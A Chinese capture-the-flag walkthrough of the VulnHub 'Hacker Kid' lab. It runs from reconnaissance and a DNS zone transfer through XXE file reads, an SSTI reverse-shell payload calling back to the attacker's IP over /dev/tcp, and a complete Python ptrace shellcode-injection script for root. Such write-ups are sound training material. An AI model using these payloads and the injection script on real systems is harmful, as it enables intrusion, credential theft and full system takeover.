实验主机:攻击机kali(192.168.109.131)
靶机Hacker_Kid-v1.0.1(192.168.109.133)
实验目标:获取root权限
实验网络:NAT
靶机下载地址:Hacker kid: 1.0.1 ~ VulnHub
一:信息收集
步骤一:确定靶机IP地址
arp-scan -l
步骤二:探测靶机开放端口
nmap -T4 -sV -O -p- -Pn 192.168.109.133
发现开放了53(DNS) 80 9999端口
浏览器访问IP地址
步骤三:目录扫描
#项目地址 https://github.com/maurosoria/dirsearch # python dirsearch.py -u "http://192.168.109.133"
步骤四:访问80端口查看源码发现让我们使用参数page_no
当page_no=1时提示更深入一点
使用BurpSuite进行抓包爆破
将抓到的包发送到 Intruder模块 设置完成后进行攻击爆破
爆破发现21与其他不同
二:漏洞探测及利用
DNS区域传输
步骤一:编辑hosts文件
vi /etc/hosts 192.168.109.133 hackers.blackhat.local //添加的内容
使用提到的dig命令 可得到所有的DNS解析记录
dig hackers.blackhat.local @192.168.109.133
步骤二:再次编辑hosts文件将刚得到解析记录也添加进去
vi /etc/hosts 192.168.109.133 hackerkid.blackhat.local 192.168.109.133 blackhat.local
步骤三:对添加的域名进行访问 打开来到一个注册页面 查看源代码发现了 XML 语句
XXE注入
步骤一:先抓包看看 构造语句进行文件查看
<!DOCTYPE foo [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
步骤二:尝试用php伪协议访问saket的文件.bashrdc
<!DOCTYPE foo [<!ENTITY test SYSTEM 'php://filter/read=convert.base64-encode/resource=/home/saket/.bashrc'>]>
得到通过Base64加密的密文 进行解密
步骤三:得到用户名和密码尝试在9999端口登录
username="admin" password="Saket!#$%@!!"
登录失败分析原因
由于该文件是在 /home/saket 目录下面的 重新整理为
username="saket" password="Saket!#$%@!!"
页面有name可能是变量
SSTI模板注入
步骤一:这里给出了一个模板注入通用的测试payload
{{1+abcdef}}${1+abcdef}<?1+abcdef?>[1+abcdef]
如果使用该payload后发现页面产生了如下图所示的报错,也是可以说明存在模板注入漏洞
步骤二:尝试反弹shell
{% import os %}{{os.system('bash -c "bash -i &> /dev/tcp/192.168.109.131/4444 0>&1"')}} 进行url编码试一下 %7b%25%20import%20os%20%25%7d%7b%7bos.system('bash%20-c%20%22bash%20-i%20%26%3e%20%2fdev%2ftcp%2f192.168.109.131%2f4444%200%3e%261%22')%7d%7d kali开启监听 nc -lvvp 4444
反弹成功
三:提权
步骤一:查找SUID
find / -perm -u=s -type f 2>/dev/null
步骤二:使用 CVE-2021-4034 漏洞
项目地址# https://github.com/berdav/CVE-2021-4034
将该漏洞zip文件下载到kali中 在本地开启http服务将该文件下载到靶机中
kali# python -m http.server 8080 shell# wget http://192.168.109.131:8080/CVE-2021-4034-main.zip ls
将下载过来的文件进行解压
unzip CVE-2021-4034-main.zip ls cd CVE-2021-4034-main ls ./cve-2021-4034.c
失败了...
Capabilitie提权
1.使用如下命令发现具有Capabilities特殊操作权限的程序
/usr/sbin/getcap -r / 2>/dev/null -r //递归查询
发现python具备cap_sys_ptrace+ep 能力,所以我们可以对其进行利用然后进行提权
2.在kali上编辑提权脚本 命名为exploit.py
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script. # GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c import ctypes import sys import struct # Macros defined in <sys/ptrace.h> # https://code.woboq.org/qt5/include/sys/ptrace.h.html PTRACE_POKETEXT = 4 PTRACE_GETREGS = 12 PTRACE_SETREGS = 13 PTRACE_ATTACH = 16 PTRACE_DETACH = 17 # Structure defined in <sys/user.h> # https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct class user_regs_struct(ctypes.Structure): _fields_ = [ ("r15", ctypes.c_ulonglong), ("r14", ctypes.c_ulonglong), ("r13", ctypes.c_ulonglong), ("r12", ctypes.c_ulonglong), ("rbp", ctypes.c_ulonglong), ("rbx", ctypes.c_ulonglong), ("r11", ctypes.c_ulonglong), ("r10", ctypes.c_ulonglong), ("r9", ctypes.c_ulonglong), ("r8", ctypes.c_ulonglong), ("rax", ctypes.c_ulonglong), ("rcx", ctypes.c_ulonglong), ("rdx", ctypes.c_ulonglong), ("rsi", ctypes.c_ulonglong), ("rdi", ctypes.c_ulonglong), ("orig_rax", ctypes.c_ulonglong), ("rip", ctypes.c_ulonglong), ("cs", ctypes.c_ulonglong), ("eflags", ctypes.c_ulonglong), ("rsp", ctypes.c_ulonglong), ("ss", ctypes.c_ulonglong), ("fs_base", ctypes.c_ulonglong), ("gs_base", ctypes.c_ulonglong), ("ds", ctypes.c_ulonglong), ("es", ctypes.c_ulonglong), ("fs", ctypes.c_ulonglong), ("gs", ctypes.c_ulonglong), ] libc = ctypes.CDLL("libc.so.6") pid=int(sys.argv[1]) # Define argument type and respone type. libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p] libc.ptrace.restype = ctypes.c_uint64 # Attach to the process libc.ptrace(PTRACE_ATTACH, pid, None, None) registers=user_regs_struct() # Retrieve the value stored in registers libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers)) print("Instruction Pointer: " + hex(registers.rip)) print("Injecting Shellcode at: " + hex(registers.rip)) # Shell code copied from exploit db. shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05" # Inject the shellcode into the running process byte by byte. for i in xrange(0,len(shellcode),4): # Convert the byte to little endian. shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16) shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex') shellcode_byte=int(shellcode_byte_little_endian,16) # Inject the byte. libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte) print("Shellcode Injected!!") # Modify the instuction pointer registers.rip=registers.rip+2 # Set the registers libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers)) print("Final Instruction Pointer: " + hex(registers.rip)) # Detach from the process. libc.ptrace(PTRACE_DETACH, pid, None, None)
3.在kali本地开启http服务将该文件下载到靶机中
kali# python -m http.server 8080 shell# wget http://192.168.109.131:8080/exploit.py ls
4.因需要root进程进行注入,编写脚本对root进程批量尝试
for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 exploit.py $i; done
脚本执行成功,可以看到5600端口正在监听 使用nc直接连接即可完成提权操作
netstat -lntp | grep 5600 nc 192.168.109.133 5600
over...